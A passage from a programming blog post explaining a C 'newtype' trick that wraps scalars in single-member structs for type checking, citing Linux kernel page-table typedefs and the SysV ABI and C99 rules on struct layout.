    static inline repr tag##_val(tag v) {   \
            return v;                       \
    }
#else
/* Same definition as above */
#endif

Because the types have identical representations, you can safely serialize your structs and exchange them between code compiled with either version. On amd64, you can probably even call between compilation units defined either way.

The next time you’re writing some subtle C code that has to deal with multiple types with the same representation, I encourage you to consider using this trick.

Addendum

I didn’t invent this trick, although as far as I know the NEWTYPE macro is my own invention (Edited to add: A commenter points out that I’m not the first to use the newtype name in C, although I think I prefer my implementation).

. I learned this trick from the Linux kernel, which uses it for a very similar application — distinguishing entries in different levels of the x86 page tables. page.h on amd64 includes following definitions [Taken from an old version, but the current version has equivalent ones):

/*
 * These are used to make use of C type-checking..
 */
typedef struct { unsigned long pte; } pte_t;
typedef struct { unsigned long pmd; } pmd_t;
typedef struct { unsigned long pud; } pud_t;
typedef struct { unsigned long pgd; } pgd_t;

I claimed above that the struct and the bare type will have the same alignment and padding. I don’t believe this is guaranteed by C99, but the SysV amd64 and i386 ABI specifications both require:

Structures and unions assume the alignment of their most strictly aligned component. Each member is assigned to the lowest available offset with the appropriate alignment. The size of any object is always a multiple of the object’s alignment.

(text quoted from the amd64 document, but the i386 one is almost identical).

And C99 requires (§6.7.2.1 para 13):

… A pointer to a structure object, suitably converted, points to its initial member (or if that member is a bit-field, then to the unit in which it resides), and vice versa. There may be unnamed padding within a structure object, but not at its beginning.

I believe these requirements, taken together, should be enough to ensure that the struct and the bare type will have the same representation.